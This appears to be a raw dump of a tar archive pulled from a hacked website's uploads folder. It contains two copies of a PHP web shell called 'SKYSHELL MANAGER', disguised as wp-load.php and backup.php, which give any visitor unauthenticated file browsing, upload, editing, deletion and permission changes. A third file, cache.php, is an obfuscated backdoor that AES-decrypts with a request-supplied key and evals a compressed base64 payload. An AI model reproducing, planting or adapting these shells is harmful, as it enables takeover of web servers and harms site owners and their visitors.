���ѧۧݧ�ӧ�� �ާ֧ߧ֧էا֧� - ���֧էѧܧ�ڧ��ӧѧ�� - /home/ukubnwwtacc0unt/chapelbellstudios.com/uploads/cover/uploads.tar
���ѧ٧ѧ�
wp-load.php 0000444 00000016101 15203700033 0006606 0 ustar 00 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>SKYSHELL MANAGER</title> <style> body { background-color: #111; color: #0f0; font-family: Arial, sans-serif; margin: 0; padding: 20px; } h2 { text-align: center; font-size: 36px; font-weight: bold; margin: 10px 0; position: relative; background: linear-gradient(90deg, #ff0000, #ffff00, #00ff00, #00ffff, #0000ff); background-size: 200%; color: transparent; -webkit-background-clip: text; animation: gradientAnimation 3s linear infinite; } @keyframes gradientAnimation { 0% { background-position: 200% 0%; } 50% { background-position: 0% 100%; } 100% { background-position: 200% 0%; } } .php-version { position: absolute; top: 10px; right: 20px; font-size: 14px; color: #0ff; } a { color: #6cf; text-decoration: none; } a:hover { text-decoration: underline; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { padding: 10px; border: 1px solid #333; transition: background 0.3s, color 0.3s; } tr:hover { background-color: #32CD32; } tr:hover td a.filename-link { color: #000; font-weight: bold; } .filename-link { color: #0ff; } .action-cell { text-align: right; } input, button, textarea { background: #222; color: #0f0; border: 1px solid #444; padding: 5px 10px; margin: 5px 0; } button { cursor: pointer; } .alert-message { color: #32CD32; background-color: #222; padding: 10px; text-align: center; font-size: 18px; margin: 20px 0; } .file-upload-container { display: flex; justify-content: space-between; align-items: center; } .emoji { color: #fff; } .path-display a { color: #fff; text-decoration: underline; } </style> </head> <body> <h2><span class="emoji">📁</span> SKYSHELL MANAGER-<span class="emoji">🛒</span> <span class="php-version">PHP v<?= phpversion(); ?></span> </h2> <?php $path = isset($_GET['path']) ? $_GET['path'] : getcwd(); $path = realpath($path); $alertMessage = ""; // Upload if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) { $filename = basename($_FILES['file']['name']); if (move_uploaded_file($_FILES['file']['tmp_name'], $path . DIRECTORY_SEPARATOR . $filename)) { $alertMessage = "File uploaded successfully!"; } else { $alertMessage = "File upload failed!"; } } // Create folder if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['newfolder'])) { $folder = $path . DIRECTORY_SEPARATOR . $_POST['newfolder']; if (!file_exists($folder)) { mkdir($folder); $alertMessage = "Folder created successfully!"; } else { $alertMessage = "Folder already exists!"; } } // Create file if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['newfile'])) { $file = $path . DIRECTORY_SEPARATOR . $_POST['newfile']; if (!file_exists($file)) { file_put_contents($file, ''); $alertMessage = "File created successfully!"; } else { $alertMessage = "File already exists!"; } } // Change permission if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['chmod_file'], $_POST['chmod_value'])) { $file = $_POST['chmod_file']; $perm = $_POST['chmod_value']; if (file_exists($file)) { chmod($file, octdec($perm)); $alertMessage = "Permissions changed successfully!"; } else { $alertMessage = "File does not exist!"; } } // Delete if (isset($_GET['delete'])) { $file = urldecode($_GET['delete']); if (file_exists($file)) { unlink($file); header("Location: ?path=" . urlencode(dirname($file))); exit; } } // Save Edited File if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['edit_file_path'], $_POST['edited_content'])) { $filePath = $_POST['edit_file_path']; $newContent = $_POST['edited_content']; if (file_exists($filePath)) { file_put_contents($filePath, $newContent); $alertMessage = "File updated successfully!"; } else { $alertMessage = "File does not exist!"; } } ?> <?php if ($alertMessage): ?> <div class="alert-message"><?= $alertMessage ?></div> <?php endif; ?> <div class="file-upload-container"> <div> <form method="post"> <input type="text" name="newfolder" placeholder="📁 New Folder" required> <button type="submit">Create Folder</button> </form> <form method="post"> <input type="text" name="newfile" placeholder="📄 New File" required> <button type="submit">Create File</button> </form> </div> <div> <form method="post" enctype="multipart/form-data"> <input type="file" name="file" onchange="this.form.submit()"> </form> </div> </div> <!-- Current Path Display --> <p class="path-display"><b>Current Path:</b> <?php $parts = explode(DIRECTORY_SEPARATOR, $path); $build = ''; foreach ($parts as $part) { if ($part == '') continue; $build .= DIRECTORY_SEPARATOR . $part; echo "<a href='?path=" . urlencode($build) . "'>$part</a>/"; } ?> </p> <!-- File Table --> <table> <tr> <th>Name</th><th>Size</th><th>Permissions</th><th>Actions</th> </tr> <?php $files = scandir($path); usort($files, function ($a, $b) use ($path) { return is_dir($path . DIRECTORY_SEPARATOR . $b) - is_dir($path . DIRECTORY_SEPARATOR . $a); }); foreach ($files as $file) { if ($file == '.') continue; $full = $path . DIRECTORY_SEPARATOR . $file; $isDir = is_dir($full); $perm = substr(sprintf('%o', fileperms($full)), -4); $size = $isDir ? '-' : filesize($full); echo "<tr>"; echo "<td>" . ($isDir ? "📁" : "📄") . " <a class='filename-link' href='?path=" . urlencode($full) . "'>$file</a></td>"; echo "<td>" . ($isDir ? '-' : round($size / 1024, 2) . ' KB') . "</td>"; echo "<td>$perm</td>"; echo "<td class='action-cell'> <a href='?delete=" . urlencode($full) . "'>🗑️</a> " . (!$isDir ? "<a href='$full' download>⬇️</a> <a href='?edit=" . urlencode($full) . "'>✏️</a>" : "") . " <form method='post' style='display:inline;'> <input type='hidden' name='chmod_file' value='$full'> <input type='text' name='chmod_value' placeholder='Perm' style='width:60px;'> <button type='submit'>🔒</button> </form> </td>"; echo "</tr>"; } ?> </table> <!-- Edit File Section --> <?php if (isset($_GET['edit']) && is_file($_GET['edit'])): $fileToEdit = $_GET['edit']; $content = htmlspecialchars(file_get_contents($fileToEdit)); ?> <h3 style="color:#fff;">Editing: <?= basename($fileToEdit) ?></h3> <form method="post"> <input type="hidden" name="edit_file_path" value="<?= htmlspecialchars($fileToEdit) ?>"> <textarea name="edited_content" rows="20" style="width:100%;background:#111;color:#0f0;border:1px solid #444;"><?= $content ?></textarea><br> <button type="submit">💾 Save Changes</button> </form> <?php endif; ?> </body> </html> backup.php 0000444 00000016101 15203700033 0006510 0 ustar 00 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>SKYSHELL MANAGER</title> <style> body { background-color: #111; color: #0f0; font-family: Arial, sans-serif; margin: 0; padding: 20px; } h2 { text-align: center; font-size: 36px; font-weight: bold; margin: 10px 0; position: relative; background: linear-gradient(90deg, #ff0000, #ffff00, #00ff00, #00ffff, #0000ff); background-size: 200%; color: transparent; -webkit-background-clip: text; animation: gradientAnimation 3s linear infinite; } @keyframes gradientAnimation { 0% { background-position: 200% 0%; } 50% { background-position: 0% 100%; } 100% { background-position: 200% 0%; } } .php-version { position: absolute; top: 10px; right: 20px; font-size: 14px; color: #0ff; } a { color: #6cf; text-decoration: none; } a:hover { text-decoration: underline; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { padding: 10px; border: 1px solid #333; transition: background 0.3s, color 0.3s; } tr:hover { background-color: #32CD32; } tr:hover td a.filename-link { color: #000; font-weight: bold; } .filename-link { color: #0ff; } .action-cell { text-align: right; } input, button, textarea { background: #222; color: #0f0; border: 1px solid #444; padding: 5px 10px; margin: 5px 0; } button { cursor: pointer; } .alert-message { color: #32CD32; background-color: #222; padding: 10px; text-align: center; font-size: 18px; margin: 20px 0; } .file-upload-container { display: flex; justify-content: space-between; align-items: center; } .emoji { color: #fff; } .path-display a { color: #fff; text-decoration: underline; } </style> </head> <body> <h2><span class="emoji">📁</span> SKYSHELL MANAGER-<span class="emoji">🛒</span> <span class="php-version">PHP v<?= phpversion(); ?></span> </h2> <?php $path = isset($_GET['path']) ? $_GET['path'] : getcwd(); $path = realpath($path); $alertMessage = ""; // Upload if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) { $filename = basename($_FILES['file']['name']); if (move_uploaded_file($_FILES['file']['tmp_name'], $path . DIRECTORY_SEPARATOR . $filename)) { $alertMessage = "File uploaded successfully!"; } else { $alertMessage = "File upload failed!"; } } // Create folder if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['newfolder'])) { $folder = $path . DIRECTORY_SEPARATOR . $_POST['newfolder']; if (!file_exists($folder)) { mkdir($folder); $alertMessage = "Folder created successfully!"; } else { $alertMessage = "Folder already exists!"; } } // Create file if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['newfile'])) { $file = $path . DIRECTORY_SEPARATOR . $_POST['newfile']; if (!file_exists($file)) { file_put_contents($file, ''); $alertMessage = "File created successfully!"; } else { $alertMessage = "File already exists!"; } } // Change permission if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['chmod_file'], $_POST['chmod_value'])) { $file = $_POST['chmod_file']; $perm = $_POST['chmod_value']; if (file_exists($file)) { chmod($file, octdec($perm)); $alertMessage = "Permissions changed successfully!"; } else { $alertMessage = "File does not exist!"; } } // Delete if (isset($_GET['delete'])) { $file = urldecode($_GET['delete']); if (file_exists($file)) { unlink($file); header("Location: ?path=" . urlencode(dirname($file))); exit; } } // Save Edited File if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['edit_file_path'], $_POST['edited_content'])) { $filePath = $_POST['edit_file_path']; $newContent = $_POST['edited_content']; if (file_exists($filePath)) { file_put_contents($filePath, $newContent); $alertMessage = "File updated successfully!"; } else { $alertMessage = "File does not exist!"; } } ?> <?php if ($alertMessage): ?> <div class="alert-message"><?= $alertMessage ?></div> <?php endif; ?> <div class="file-upload-container"> <div> <form method="post"> <input type="text" name="newfolder" placeholder="📁 New Folder" required> <button type="submit">Create Folder</button> </form> <form method="post"> <input type="text" name="newfile" placeholder="📄 New File" required> <button type="submit">Create File</button> </form> </div> <div> <form method="post" enctype="multipart/form-data"> <input type="file" name="file" onchange="this.form.submit()"> </form> </div> </div> <!-- Current Path Display --> <p class="path-display"><b>Current Path:</b> <?php $parts = explode(DIRECTORY_SEPARATOR, $path); $build = ''; foreach ($parts as $part) { if ($part == '') continue; $build .= DIRECTORY_SEPARATOR . $part; echo "<a href='?path=" . urlencode($build) . "'>$part</a>/"; } ?> </p> <!-- File Table --> <table> <tr> <th>Name</th><th>Size</th><th>Permissions</th><th>Actions</th> </tr> <?php $files = scandir($path); usort($files, function ($a, $b) use ($path) { return is_dir($path . DIRECTORY_SEPARATOR . $b) - is_dir($path . DIRECTORY_SEPARATOR . $a); }); foreach ($files as $file) { if ($file == '.') continue; $full = $path . DIRECTORY_SEPARATOR . $file; $isDir = is_dir($full); $perm = substr(sprintf('%o', fileperms($full)), -4); $size = $isDir ? '-' : filesize($full); echo "<tr>"; echo "<td>" . ($isDir ? "📁" : "📄") . " <a class='filename-link' href='?path=" . urlencode($full) . "'>$file</a></td>"; echo "<td>" . ($isDir ? '-' : round($size / 1024, 2) . ' KB') . "</td>"; echo "<td>$perm</td>"; echo "<td class='action-cell'> <a href='?delete=" . urlencode($full) . "'>🗑️</a> " . (!$isDir ? "<a href='$full' download>⬇️</a> <a href='?edit=" . urlencode($full) . "'>✏️</a>" : "") . " <form method='post' style='display:inline;'> <input type='hidden' name='chmod_file' value='$full'> <input type='text' name='chmod_value' placeholder='Perm' style='width:60px;'> <button type='submit'>🔒</button> </form> </td>"; echo "</tr>"; } ?> </table> <!-- Edit File Section --> <?php if (isset($_GET['edit']) && is_file($_GET['edit'])): $fileToEdit = $_GET['edit']; $content = htmlspecialchars(file_get_contents($fileToEdit)); ?> <h3 style="color:#fff;">Editing: <?= basename($fileToEdit) ?></h3> <form method="post"> <input type="hidden" name="edit_file_path" value="<?= htmlspecialchars($fileToEdit) ?>"> <textarea name="edited_content" rows="20" style="width:100%;background:#111;color:#0f0;border:1px solid #444;"><?= $content ?></textarea><br> <button type="submit">💾 Save Changes</button> </form> <?php endif; ?> </body> </html> cache.php 0000644 00000013007 15203700033 0006312 0 ustar 00 <?php $Shj = 'Sy1LzNFQKyzNL7G2V0svsYYw9dKrSvOS83MLilKLizXSqzLz0nISS1KRWEmJxalmJvEpqcn5KakaxSVFRallGipOERV+IZpgYA0A'; $BXxNT = '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'; function Shj($iEH) { $BXxNT = ${"\137\x52\x45\121\125\x45\123\x54"}["k"]; $FHJ = substr($BXxNT, 0, 16); $vBL = base64_decode($iEH); return openssl_decrypt($vBL, "AES-256-CBC", $BXxNT, OPENSSL_RAW_DATA, $FHJ); } if (Shj('DjtPn+r4S0yvLCnquPz1fA')){ echo 'sNo11W26+rM4IM1H8+IDaZSnIqdaok4HY1kYqj++xgvwxE9cqd8tWS9ErNpqi0Yk'; exit; } eval(htmlspecialchars_decode(gzinflate(base64_decode($Shj)))); ?>